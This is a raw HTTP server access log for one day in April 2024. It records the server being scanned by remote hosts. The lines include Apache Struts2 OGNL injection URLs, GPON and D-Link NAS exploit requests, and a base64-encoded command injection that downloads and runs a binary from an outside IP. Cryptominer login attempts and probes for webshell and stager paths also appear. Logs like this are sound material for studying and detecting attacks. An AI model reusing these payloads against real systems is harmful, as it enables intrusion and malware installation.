106.240.234.154 - - [16/Apr/2024 11:31:15] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:31:15] "GET /login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:31:18] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:31:18] "GET /main.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:31:21] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:31:21] "GET /default.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:31:25] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:31:25] "GET /register.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:31:28] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:31:28] "GET /login/login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:31:31] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:31:31] "GET /login/indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:31:34] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:31:34] "GET /indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:31:37] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:31:37] "POST / HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:31:40] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:31:40] "POST /index.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:31:44] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:31:44] "POST /login.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:31:47] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:31:47] "POST /index.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:31:50] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:31:50] "POST /index.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:31:53] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:31:53] "POST /login.do HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:31:57] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:31:57] "POST /login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:32:00] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:32:00] "POST /main.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:32:03] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:32:03] "POST /default.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:32:06] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:32:06] "POST /register.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:32:09] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:32:09] "POST /login/login.jsp HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:32:12] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:32:12] "POST /login/indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:32:15] code 501, message Unsupported method ('POST') 106.240.234.154 - - [16/Apr/2024 11:32:15] "POST /indexAction.action HTTP/1.1" 501 - 106.240.234.154 - - [16/Apr/2024 11:32:19] "GET /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 200 - 106.240.234.154 - - [16/Apr/2024 11:32:22] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:22] "GET /index.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:32:25] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:25] "GET /login.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:32:28] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:28] "GET /index.do?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:32:31] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:31] "GET /index.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:32:33] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:33] "GET /login.do?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:32:36] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:36] "GET /login.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:32:38] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:38] "GET /main.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:32:40] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:40] "GET /default.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:32:42] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:42] "GET /register.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:32:44] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:44] "GET /login/login.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:32:45] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:45] "GET /login/indexAction.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 106.240.234.154 - - [16/Apr/2024 11:32:47] code 404, message File not found 106.240.234.154 - - [16/Apr/2024 11:32:47] "GET /indexAction.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1" 404 - 107.151.243.170 - - [16/Apr/2024 12:33:44] code 400, message Bad request version ('À\\x14À') 107.151.243.170 - - [16/Apr/2024 12:33:44] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x1bÙâ§XÆijQ\x08z\x07´7´H0\x8bºbäøg´¾Ý¼w_\x9c¼\x1c\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 45.79.181.179 - - [16/Apr/2024 12:36:20] code 400, message Bad request version ('À\\x14À') 45.79.181.179 - - [16/Apr/2024 12:36:20] "\x16\x03\x01\x00\x85\x01\x00\x00\x81\x03\x03úÞ'Bj¿\x9f?Á)\x1a\x15¬F\x09:+\x8dlÜIw\x81LJ©u5\x84ì\x0dn\x00\x00 À/À0À+À,̨̩À\x13À\x09À\x14À" 400 - 194.120.230.94 - - [16/Apr/2024 13:00:16] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [16/Apr/2024 13:01:49] "GET / HTTP/1.1" 200 - 198.235.24.81 - - [16/Apr/2024 13:37:02] code 400, message Bad request version ('\\x9a!ò') 198.235.24.81 - - [16/Apr/2024 13:37:02] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03%S;¤Ö\x1dÑÏ*U\x06¥[b\x8aLÚs§\x1f\x08}Ð\x12ÉV\x05\x12\x0fw}1 .99Ó2»\x8b×Ô~QºtÏüvt\x1d\x9a!ò" 400 - 198.235.24.81 - - [16/Apr/2024 13:37:03] code 400, message Bad request version ('À(À$À\\x14À') 198.235.24.81 - - [16/Apr/2024 13:37:03] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03Æ»\x98^°=[7êº[]\x7fç\x11Ø\x1er\x93ûq\x80Ð<)\x81\x87¦?#¤î\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 170.130.165.74 - - [16/Apr/2024 13:50:31] code 400, message Bad request version ('À\\x13À') 170.130.165.74 - - [16/Apr/2024 13:50:31] "\x16\x03\x01\x00ê\x01\x00\x00æ\x03\x03ïpS\x0b\x9bSX¢P\x8dx\x8a<ÑçôePõ\x9a\\x13\\x02\\x13\\x03\\x13\\x01À,À0\\x00\\x9f̨̩̪À+À/\\x00\\x9eÀ$À(\\x00kÀ#À'\\x00gÀ") 138.68.106.166 - - [16/Apr/2024 15:09:21] "\x16\x03\x01\x01 \x01\x00\x01\x1c\x03\x03Îâ|³\x1d¬\x0fÐîß\x0c¥þûÏ\x1aÈ\x8fü¬åJ\x9c\x08IZ¶,|\x00&\x0c ÛƱ\x1c \x8f½Ô\x07\x81}\x19opæ\x19sÕÙZ\x97\x19Q=Õ\x09\x97rîç, \x00>\x13\x02\x13\x03\x13\x01À,À0\x00\x9f̨̩̪À+À/\x00\x9eÀ$À(\x00kÀ#À'\x00gÀ" 400 - 64.62.156.76 - - [16/Apr/2024 15:59:19] "GET / HTTP/1.1" 200 - 64.62.156.67 - - [16/Apr/2024 16:01:16] code 404, message File not found 64.62.156.67 - - [16/Apr/2024 16:01:16] "GET /favicon.ico HTTP/1.1" 404 - 64.62.156.67 - - [16/Apr/2024 16:01:55] code 404, message File not found 64.62.156.67 - - [16/Apr/2024 16:01:55] "GET /geoserver/web/ HTTP/1.1" 404 - 157.245.32.31 - - [16/Apr/2024 16:14:26] code 400, message Bad request version ('\\x01@A$ä\\x00\\x01<Ì\\x14Ì\\x13Ì\\x15À0À,À(À$À\\x14À') 157.245.32.31 - - [16/Apr/2024 16:14:26] "\x16\x03\x01\x01þ\x01\x00\x01ú\x03\x03\x14^2\x93îdiÈZ^åK\x96\x05-ô£ÔÔrC2§ç\x0c\x9b\x0c\x01@A$ä\x00\x01<Ì\x14Ì\x13Ì\x15À0À,À(À$À\x14À" 400 - 146.19.24.28 - - [16/Apr/2024 16:36:05] "GET / HTTP/1.1" 200 - 194.120.230.94 - - [16/Apr/2024 16:36:44] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [16/Apr/2024 16:45:02] "GET / HTTP/1.1" 200 - 51.254.59.113 - - [16/Apr/2024 16:54:36] "GET / HTTP/1.1" 200 - 51.254.59.113 - - [16/Apr/2024 16:54:37] "GET /images/ HTTP/1.1" 200 - 91.205.8.26 - - [16/Apr/2024 17:45:21] code 404, message File not found 91.205.8.26 - - [16/Apr/2024 17:45:21] "GET /playlist.m3u8 HTTP/1.1" 404 - 91.205.8.26 - - [16/Apr/2024 17:53:08] code 404, message File not found 91.205.8.26 - - [16/Apr/2024 17:53:08] "GET /playlist.m3u8 HTTP/1.1" 404 - 91.205.8.26 - - [16/Apr/2024 17:54:12] code 404, message File not found 91.205.8.26 - - [16/Apr/2024 17:54:12] "GET /playlist.m3u8 HTTP/1.1" 404 - 80.66.77.235 - - [16/Apr/2024 17:56:01] "GET / HTTP/1.1" 200 - 80.66.77.235 - - [16/Apr/2024 18:08:43] "GET / HTTP/1.1" 200 - 64.62.197.153 - - [16/Apr/2024 18:10:32] code 400, message Bad request version ('À\\x14À') 64.62.197.153 - - [16/Apr/2024 18:10:32] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03Øw\x07qµ\x1f¯\x0c3¦¢b»?Ð\\¡õ\x86j¢\x0f;y\x05\x87:c[j¬ý\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 80.66.77.235 - - [16/Apr/2024 18:30:53] "GET / HTTP/1.1" 200 - 80.94.92.60 - - [16/Apr/2024 18:31:40] code 404, message File not found 80.94.92.60 - - [16/Apr/2024 18:31:40] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cm0JLXJmCWFybTU= HTTP/1.1" 404 - 162.243.142.21 - - [16/Apr/2024 18:33:29] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 162.243.142.21 - - [16/Apr/2024 18:33:29] "MGLNDD_203.219.129.101_80" 400 - 41.233.245.112 - - [16/Apr/2024 18:47:48] code 501, message Unsupported method ('POST') 41.233.245.112 - - [16/Apr/2024 18:47:48] "POST /GponForm/diag_Form?images/ HTTP/1.1" 501 - 146.19.24.28 - - [16/Apr/2024 19:20:55] "GET / HTTP/1.1" 200 - 134.209.252.254 - - [16/Apr/2024 19:22:10] "GET / HTTP/1.1" 200 - 134.209.252.254 - - [16/Apr/2024 19:22:11] code 404, message File not found 134.209.252.254 - - [16/Apr/2024 19:22:11] "GET /favicon.ico HTTP/1.1" 404 - 159.203.208.30 - - [16/Apr/2024 19:38:31] "GET / HTTP/1.1" 200 - 164.92.193.212 - - [16/Apr/2024 20:02:21] "GET / HTTP/1.1" 200 - 164.92.193.212 - - [16/Apr/2024 20:02:22] code 404, message File not found 164.92.193.212 - - [16/Apr/2024 20:02:22] "GET /favicon.ico HTTP/1.1" 404 - 80.94.92.60 - - [16/Apr/2024 20:22:37] code 404, message File not found 80.94.92.60 - - [16/Apr/2024 20:22:37] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cm0JLXJmCWFybTV8d2dldAlodHRwOi8vOTQuMTU2LjguMjQ0L2FybTUJfGNobW9kCTc3Nwlhcm01CXwJLi9hcm01CWRsaW5rbmFz HTTP/1.1" 404 - 195.170.172.128 - - [16/Apr/2024 20:33:12] code 400, message Bad request version ("x\\x9fß5Ó\\x95\\x13´¹×\\x8a\\x00>\\x13\\x02\\x13\\x03\\x13\\x01À,À0\\x00\\x9f̨̩̪À+À/\\x00\\x9eÀ$À(\\x00kÀ#À'\\x00gÀ") 195.170.172.128 - - [16/Apr/2024 20:33:12] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03+c×Q V\x16o\x06S\x1e>Ƕq\x19Wõ¼\x93¨\x9d\x8bMÂP\x9e×\x01S\x87\x8b ü9h\x85Yþ\x8eTßk\x05©1\x8cá\x1f\x88\x9a\x0ce x\x9fß5Ó\x95\x13´¹×\x8a\x00>\x13\x02\x13\x03\x13\x01À,À0\x00\x9f̨̩̪À+À/\x00\x9eÀ$À(\x00kÀ#À'\x00gÀ" 400 - 195.170.172.128 - - [16/Apr/2024 20:33:14] code 400, message Bad request version ('["cpuminer/2.5.1"]}') 195.170.172.128 - - [16/Apr/2024 20:33:14] "{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}" 400 - 195.170.172.128 - - [16/Apr/2024 20:33:15] code 400, message Bad request version ('"EthereumStratum/1.0.0"]}') 195.170.172.128 - - [16/Apr/2024 20:33:15] "{"id": 1, "method": "mining.subscribe", "params": ["MinerName/1.0.0", "EthereumStratum/1.0.0"]}" 400 - 195.170.172.128 - - [16/Apr/2024 20:33:16] code 400, message Bad request syntax ('{"id":1,"method":"eth_submitLogin","worker":"igwrcvap","params":["0xa2e960672cdafbb258e337f7fa25ef64a2e83ed1","x"],"jsonrpc":"2.0"}') 195.170.172.128 - - [16/Apr/2024 20:33:16] "{"id":1,"method":"eth_submitLogin","worker":"igwrcvap","params":["0xa2e960672cdafbb258e337f7fa25ef64a2e83ed1","x"],"jsonrpc":"2.0"}" 400 - 195.170.172.128 - - [16/Apr/2024 20:33:18] code 400, message Bad request version ('msvc/2019","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}') 195.170.172.128 - - [16/Apr/2024 20:33:18] "{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"48NQTQ4FpRUg7x2YxruJzAid7h2dtyyQ5hbcKMpegmtqEqTom4Ndy6tf12Ay8HSZFahZmiyX67DQ7aLrz1xaFsnB4VkiWFD","pass":"x","agent":"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}" 400 - 195.170.172.128 - - [16/Apr/2024 20:33:19] "GET / HTTP/1.1" 200 - 195.170.172.128 - - [16/Apr/2024 20:33:21] code 501, message Unsupported method ('POST') 195.170.172.128 - - [16/Apr/2024 20:33:21] "POST / HTTP/1.1" 501 - 195.170.172.128 - - [16/Apr/2024 20:33:23] code 501, message Unsupported method ('POST') 195.170.172.128 - - [16/Apr/2024 20:33:23] "POST / HTTP/1.1" 501 - 195.170.172.128 - - [16/Apr/2024 20:33:24] code 404, message File not found 195.170.172.128 - - [16/Apr/2024 20:33:24] "GET /WuEL HTTP/1.1" 404 - 195.170.172.128 - - [16/Apr/2024 20:33:25] code 404, message File not found 195.170.172.128 - - [16/Apr/2024 20:33:25] "GET stager64 HTTP/1.1" 404 - 195.170.172.128 - - [16/Apr/2024 20:33:27] code 404, message File not found 195.170.172.128 - - [16/Apr/2024 20:33:27] "GET /a HTTP/1.1" 404 - 195.170.172.128 - - [16/Apr/2024 20:33:28] code 404, message File not found 195.170.172.128 - - [16/Apr/2024 20:33:28] "GET /download/file.ext HTTP/1.1" 404 - 195.170.172.128 - - [16/Apr/2024 20:33:30] code 404, message File not found 195.170.172.128 - - [16/Apr/2024 20:33:30] "GET /SiteLoader HTTP/1.1" 404 - 195.170.172.128 - - [16/Apr/2024 20:33:31] code 404, message File not found 195.170.172.128 - - [16/Apr/2024 20:33:31] "GET /mPlayer HTTP/1.1" 404 - 195.170.172.128 - - [16/Apr/2024 20:33:37] code 501, message Unsupported method ('POST') 195.170.172.128 - - [16/Apr/2024 20:33:37] "POST / HTTP/1.1" 501 - 41.233.245.112 - - [16/Apr/2024 21:00:56] code 501, message Unsupported method ('POST') 41.233.245.112 - - [16/Apr/2024 21:00:56] "POST /GponForm/diag_Form?images/ HTTP/1.1" 501 - 142.93.216.145 - - [16/Apr/2024 21:10:08] code 400, message Bad request version ('À\\x14À') 142.93.216.145 - - [16/Apr/2024 21:10:08] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03)6<ô\x1b\x1c]S\x9a$À1¾Jé\x8b\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 142.93.216.145 - - [16/Apr/2024 21:10:09] code 400, message Bad request version ('À\\x14À') 142.93.216.145 - - [16/Apr/2024 21:10:09] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03í\x02x¹+^\x96Õñv\x09;óS\x12\x86øT`f\x0d\x87²¡¨ñó¾\x0cå[å\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 142.93.216.145 - - [16/Apr/2024 21:10:09] "GET / HTTP/1.1" 200 - 142.93.216.145 - - [16/Apr/2024 21:10:10] code 404, message File not found 142.93.216.145 - - [16/Apr/2024 21:10:10] "GET /form.html HTTP/1.1" 404 - 142.93.216.145 - - [16/Apr/2024 21:10:11] code 404, message File not found 142.93.216.145 - - [16/Apr/2024 21:10:11] "GET /upl.php HTTP/1.1" 404 - 142.93.216.145 - - [16/Apr/2024 21:10:11] code 400, message Bad request version ('À\\x14À') 142.93.216.145 - - [16/Apr/2024 21:10:11] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03W\x8db8\x8d/\x15vä4·À \x00ios\x92oIǤK »´\x1coö}\x1b´\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 142.93.216.145 - - [16/Apr/2024 21:10:12] code 404, message File not found 142.93.216.145 - - [16/Apr/2024 21:10:12] "GET /geoip/ HTTP/1.1" 404 - 142.93.216.145 - - [16/Apr/2024 21:10:12] code 404, message File not found 142.93.216.145 - - [16/Apr/2024 21:10:12] "GET /favicon.ico HTTP/1.1" 404 - 142.93.216.145 - - [16/Apr/2024 21:10:13] code 404, message File not found 142.93.216.145 - - [16/Apr/2024 21:10:13] "GET /1.php HTTP/1.1" 404 - 142.93.216.145 - - [16/Apr/2024 21:10:13] code 404, message File not found 142.93.216.145 - - [16/Apr/2024 21:10:13] "GET /bundle.js HTTP/1.1" 404 - 142.93.216.145 - - [16/Apr/2024 21:10:14] code 404, message File not found 142.93.216.145 - - [16/Apr/2024 21:10:14] "GET /files/ HTTP/1.1" 404 - 142.93.216.145 - - [16/Apr/2024 21:10:15] code 404, message File not found 142.93.216.145 - - [16/Apr/2024 21:10:15] "GET /systembc/password.php HTTP/1.1" 404 - 142.93.216.145 - - [16/Apr/2024 21:10:15] code 404, message File not found 142.93.216.145 - - [16/Apr/2024 21:10:15] "GET /password.php HTTP/1.1" 404 - 142.93.216.145 - - [16/Apr/2024 21:10:16] code 404, message File not found 142.93.216.145 - - [16/Apr/2024 21:10:16] "GET /info.php HTTP/1.1" 404 - 